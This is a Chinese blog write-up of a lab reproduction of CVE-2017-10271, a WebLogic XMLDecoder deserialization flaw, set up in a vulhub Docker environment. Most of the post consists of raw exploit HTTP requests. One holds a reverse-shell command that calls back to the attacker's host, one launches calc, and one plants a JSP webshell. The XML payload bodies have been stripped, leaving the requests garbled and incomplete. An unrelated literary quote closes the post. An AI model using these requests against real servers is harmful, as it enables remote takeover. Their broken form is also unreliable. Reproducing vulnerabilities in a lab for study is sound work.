CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)

文章链接

文章目录

      • 影响版本
      • 漏洞详情
      • 环境搭建
      • 漏洞检测
      • 漏洞复现
        • 反弹shell
        • 弹出计算器
        • 写入shell进行利用
      • 摘抄

影响版本

Oracle WebLogic Server 10.3.6.0.0版本
Oracle WebLogic Server 12.1.3.0.0版本
Oracle WebLogic Server 12.2.1.1.0

漏洞详情

  • Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。
  • 使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。
  • 攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。

环境搭建

  • kali linux:192.168.2.54
  • Ubuntu:dockers 192.168.2.64
cd vulhub-master/weblogic/cve-2017-10271
sudo docker-compose up -d 
http://192.168.2.64:7001/

CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第1张图片
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第2张图片
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第3张图片

漏洞检测

方法一:
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第4张图片
方法二:
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第5张图片

漏洞复现

反弹shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.64:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 636


 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.2.54/888 0>&1








CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第6张图片
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第7张图片
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第8张图片

弹出计算器

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.64:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 958



    
       
           
               
                    
                        
                           calc
                        
                        
                            
                        
                        
                             
                        
                    
                
           
       
   
    
    

CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第9张图片

写入shell进行利用

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.64:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 648



    
    
    
     
    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
    
    
    ]]>
    
    
    
    
    
    
    

CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第10张图片
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)_第11张图片

摘抄


人在寂寞中有三种状态。
一是惶惶不安,茫无头绪,
百事无心,一心逃出寂寞。
二是渐渐习惯于寂寞,安下心来,
建立起生活的条理,
用读书、写作或别的事务来驱逐寂寞。
三是寂寞本身成为一片诗意的土壤,
一种创造的契机,
诱发出关于存在、生命、
自我的深邃思考和体验。
– 周国平


你可能感兴趣的:(漏洞复现,CVE-2017-10271,Weblogic,反序列化漏洞,XMLDecoder,反序列化)